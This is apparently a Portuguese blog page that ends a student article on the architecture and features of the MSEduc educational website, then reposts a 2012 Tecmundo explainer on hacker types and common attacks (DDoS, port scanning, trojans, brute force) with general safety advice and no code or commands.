  • Alta escabilidade – Como não é possível mensurar a quantidade de acessos que o sistema poderá ter, é muito importante que haja uma capacidade de crescer mais de acordo com a demanda.
  • Desempenho – Utilizando tecnologias bem interativas e leves, o sistema terá um tempo de resposta entre 0 e 3,2 segundos, independendo o usuário migrar para outros site ou plataforma.
  • Facilidade de Gerenciamento da Infraestrutura de Hardware – Caso haja alguma problema nas funcionalidade do site ou da plataforma, será ferramentas para que facilitem o gerenciamento da infraestrutura, minimizando o problema o mais rápido possível.
  • Facilidade de Gerenciamento de Conteúdo – Para melhor atualização das informações e arquivos contidos na plataforma, o gerenciador de conteúdo, conta com ferramentas bastante interativas com o intuito de minimizar o problema o mais rápido possível.
  • Tolerância a falhas – Caso ocorrer um erro, o sistema é capaz de se recuperar daquele erro, de forma que fique inacessível para os usuários, através da facilidade do gerenciador de conteúdo.
O sistema irá comportar numa arquitetura Client-Servidor, onde poderá acessar de qualquer tipo de dispositivo (Desktop, Mobile, etc) através de um navegador web, onde toda a conexão com qualquer tipo de cliente é totalmente criptografada, isso minimizando o risco que informações confidenciais possam ser visualizadas na plataforma, ou por aqueles que queria realizar qualquer tipo de ataque ou roubo das mesmas, garantindo a privacidade, confidencialidade dos dados de cada usuário cadastrado no sistema.
Quando o usuário acessar através do browser, o protocolo utilizado será obrigatoriamente o HTTP, no entanto, quando o mesmo, acessar a plataforma utilizando o login e sua senha, automaticamente as informações serão validadas, e os dados digitados irão passar por um tunelamento de segurança criptografado através do protocolo HTTPS, utilizando também a criptografia SSH (Secure Shell).
Na figura 2 será mostrado toda a arquitetura do servidor de hospedagem, e na figura 3, será mostra a arquitetura Client-Servidor acessando a website e a plataforma, utilizando os protocolos HTTP, HTTPS e SSH.

PRINCIPAIS FUNCIONALIDADES

Ao acessar o endereço onde o MSEduc Educação Digital está hospedado, o usuário visualiza a tela inicial como mostrada nas figuras 4 e 5. 

1. Barra de menus: apresenta links de acesso rápido ao portal.
2. Banner Institucional: No topo do portal, é exibido o vídeo institucional, apresentando o MSEduc Educação Digital a seus usuários.
3. Acesso ao Portal: provê o acesso à plataforma, através da tela de login e senha.x
4. Menu Principal: apresenta todas as informações do site (dicas, informações sobre professores, artigos, tutoriais, etc.)
5. Últimas Notícias: apresenta notícias de interesse sobre de educação, como notícias sobre vestibulares, cursos, profissões, etc.
6. Redes Sociais: tem o intuito de fornecer informações e tirar dúvidas sobre o MSEduc, disciplinas, conteúdos e como utilizar a plataforma.
7. Parceiros: Mostra os principais parceiros, participantes na elaboração do conteúdo das aulas.
8. Publicidade: área onde são apresentados conteúdo publicitário.


 Referências

[1]   Educação à Distância no Brasil. Disponível em: http://portal.mec.gov.br/. Acessado em: 17/11/2012.

[2]  Artigo: Educação a distância: conceitos e história no Brasil e no mundo. Lucineia Alves. Universidade Federal do Rio de Janeiro. Disponível em: http://www.abed.org.br/revistacientifica/Revista_PDF_Doc/2011/Artigo_07.pdf. Acessado em 17/11/2012.

[3] EAD - Educação a Distância. Universidade Aberta do Brasil. Disponível em: http://www.catalao.go.gov.br/educacao/UAB.html. Acessado em 17/11/2012.

[4] Educação a Distância. Disponível em:http://pt.wikipedia.org/wiki/Educação_a_distância. Acessado em: 17/11/2012.

[5] EAD: Vantagens do Ensino a Distância. Disponível em:http://www.mundovestibular.com.br/articles/14617/1/EAD-Vantagens-do-Ensino-a-Distancia/Pagina1.html. Acessado em 17/11/2012.

[6] MVC em PHP na prática. Disponível emhttp://pro.imasters.com.br/online/cursos/mvc-em-php-na-pratica-construindo-um-sistema-de-pedidos. Acessado em 20/11/2012.

[7] Definição de PHP e suas propriedades. Disponível em http://www.criarweb.com/artigos/202.php. Acessado em 21/11/2012[8] Definição de PHP e suas propriedades. Disponível em http://www.criarweb.com/artigos/202.php. 


CONCLUSÃO

Neste artigo apresentamos o MSEduc, que é uma website educacional, desenvolvida através de tecnologias web e infraestrutura das nuvens computacionais, sendo a principal finalidade a massificação de assuntos abordados em sala de aula para alunos em diversos tipos de níveis, apresentando um serviço bastante eficaz e de fácil manuseio, tendo sido disponibilizada como serviço à comunidade, sendo prática, sem limitações de uso ou limitações tecnológicas, tendo uma utilização de tecnologia elástica e global.

terça-feira, 25 de dezembro de 2012


Os 4 ataques hackers mais comuns da web
Como funciona, o que os motiva e como se proteger da crescente ameaça hacker existente na web.



O começo de 2012 está sendo marcado pela forte presença de um grupo de pessoas que difunde uma ideia de liberdade e se autodenomina Anonymous. Esses indivíduos, também conhecidos como hackers, estão utilizando ataques virtuais para demonstrar seus ideais e objetivos.
Mas os ataques hacker não são uma novidade. Tal movimento existe desde quando a internet foi criada e pode ser feito das mais diferentes formas. Para ajudar você a entender melhor como tudo isso funciona, nós do Tecmundo fizemos uma lista dos principais conceitos deste mundo.
O que leva uma pessoa a se tornar um hacker?
Ataques hacker são considerados ilegais e uma ofensa a qualquer empresa ou governo que tenha sido vitimado. Não só isso: o próprio governo dos Estados Unidos já considera que as ameaças virtuais estão andando a passos largos para se tornar mais perigosas que o próprio terrorismo.

Mas com relação aos tipos de envolvidos, há os hackers “do bem” e os “do mal”. Entenda abaixo as diferenças:
  • White Hat Hackers (Hackers de chapéu branco): esses são os mocinhos. Fazem parte do grupo de profissionais da área de segurança, que se especializam em teste de vulnerabilidades e penetração, para garantir que os dados do seu contratante estejam realmente seguros. Eles precisam ter experiência em invasão justamente para saber as melhores maneiras de se proteger dela.

  • Black Hat Hackers (Hackers de chapéu preto): também são conhecidos como os vilões. Normalmente, ao nos referirmos a eles, usamos somente o termo hacker. Nesse grupo estão todos aqueles que quebram redes e computadores em busca de informações, criam vírus, malwares e praticam qualquer outra forma de ação que possa se tornar prejudicial a alguém.

  • Script Kiddies: esse é um termo perjorativo, que os próprios hackers utilizam, para se referir àquelas pessoas que usam programas e procedimentos já existentes para tentar se tornar famosos no meio. É o que pode ser considerado como “amador”.

  • Hacktivists: é nesse grupo que o Anonymous se encaixa. Os ativistas são normalmente motivados por ideologias políticas ou religiosas e normalmente buscam revelar ao mundo os problemas existentes nessas áreas. Vingança também é um forte motivador dos hacktivists.

  • State Sponsored Hackers (Hackers patrocinados pelo Estado): claro que a atividade hacker é importante também no mundo militar. Portanto, é comum os governos contratarem pessoas com tal experiência tanto para executarem ataques contra outros países quanto para trabalhar em suas próprias defesas. Afinal, a informação é o novo petróleo da humanidade, e quem controlá-la possui vantagens.

  • Spy Hackers: da mesma forma que os governos, empresas privadas também contratam hackers para, normalmente, infiltrarem-se na concorrência e, assim, poder roubar segredos industriais. Hacktivists podem fazer parte desse grupo, mas aqui o objetivo é unicamente o dinheiro.

  • Cyber Terrorists: esse conceito é muito parecido com os terroristas da forma que conhecemos. Também com motivações politicas ou religiosas, essas pessoas tem como objetivo simplesmente instaurar o caos por toda a internet.

Mas, afinal, como eles agem?
O ataque DDoS é um dos tipos de ameaça que se tornou famoso nos últimos meses justamente por ter sido o tipo de ataque mais executado pelo Anonymous para derrubar diversos sites pelo mundo. Mas, além dele, existem outros tipos que você vai conhecer abaixo:
DDoS ATTACK
Um Distributed Denial-of-Service ATTACK é uma maneira relativamente simples de derrubar algum service. O objetivo aqui é unicamente o de tornar uma página ou processo indisponível para o usuário final.
Para efetuar o processo, os hackers precisam criar uma rede zumbi (BotNet), que inclui uma infinidade de computadores infectados de maneira que eles possam ser controlados por um host “mestre”. Quando o hacker escolhe o alvo, ele envia o IP para o mestre, que se encarrega de distribuí-lo por toda a rede zumbi. Essa rede pode incluir milhares de computadores que são responsáveis por sobrecarregar o alvo até que ele se torne indisponível.
Por ter múltiplas fontes, o rastreamento e bloqueio desse tipo de ataque é bastante complicado.

Port Scanning Attack
Essa é uma técnica bastante utilizada para encontrar fraquezas em um determinado servidor. Embora, casualmente, ela seja utilizada justamente pelos responsáveis pela segurança para encontrar vulnerabilidades no sistema, esses ataques normalmente estão relacionados ao uso de softwares maliciosos para que as brechas possam ser exploradas.
Port Scanning Attack consiste em enviar uma mensagem para uma porta e esperar por uma resposta. O dado que for recebido, então, vai indicar ao hacker se aquela porta está disponível ou não, o que vai ajudá-lo a encontrar a melhor maneira de invadir tal servidor.
Cavalos de Troia, vírus e outros malwares
Esses programas são normalmente desenvolvidos pelos hackers com o único objetivo de gerar destruição do alvo.
Os vírus e worms normalmente se aderem a um sistema de forma que possam inviabilizar o uso de uma máquina ou de uma rede como um todo, e são normalmente disseminados por email ou ficam escondidos dentro de aplicações de interesse do usuário.
Os Cavalos de Troia são parecidos, pois infectam o computador da mesma forma, mas normalmente não são responsáveis por criar defeitos no sistema. Na verdade, eles normalmente oferecem ao hacker o acesso ao computador vitimado, passando diversos tipos de informações.
Ataques de Força Bruta
Essa é a maneira mais famosa que existe para se quebrar senhas. Consiste em tentar todas as combinações possíveis até que o password seja encontrado. Porém, com o crescimento do tamanho das senhas, as combinações possíveis aumentam exponencialmente e, com isso, também aumenta o tempo necessário para serem decifradas.
Um exemplo de ataque de força bruta a um FTP pode, por exemplo, gerar um log parecido com o código abaixo, que demonstra uma série de tentativas de conexão provenientes de um mesmo IP:

Mas será que minha página, rede ou computador está vulnerável?
A resposta, claramente, é sim. Mesmo que você utilize todos os sistemas de segurança possíveis, é inevitável que haja ao menos uma brecha que possa ser explorada. O que pode ser feito é tomar todos os cuidados devidos para que as chances de um ataque de sucesso sejam consideravelmente reduzidas.
Claro que problemas assim não são novidade, e o uso de um bom antivírus pode normalmente sanar todos os riscos do seu computador pessoal. Mas com a evolução da internet e, principalmente, do compartilhamento de informações e arquivos através da nuvem, as ameaças estão tomando uma perspectiva completamente nova.


Comumente, vemos notícias de empresas que tiveram seu banco de dados “roubados” por hackers. E se nesse banco de dados constar o seu cadastro? Isso provavelmente não será um problema, pois dados mais importantes, principalmente relacionados ao número do seu cartão, normalmente possuem uma criptografia fortíssima.
Mas vamos a um exemplo prático: digamos que a base de dados de emails do Mercado Livre tenha sido roubada. Em um primeiro momento, pode parecer que não é grande coisa. Entretanto, com os emails dos clientes, o hacker pode enviar uma mensagem se passando pelo Mercado Livre pedindo para que você envie outros dados (o famoso phishing). Considerando que o email chegou na caixa que você normalmente recebe todos os emails da empresa, identificar que ele é falso vai se tornar muito mais difícil.
Portanto, a melhor maneira de se proteger é, ainda, agindo com parcimônia e cuidado. Na internet, muitas vezes as coisas não são o que aparentam ser, e a atenção é sempre uma maneira importante e bastante eficaz de evitar problemas mais sérios.
Para mais informações:http://www.tecmundo.com.br/ataque-hacker/19600-os-4-ataques-hackers-mais-comuns-da-web.htm#ixzz2G5Wx4dWL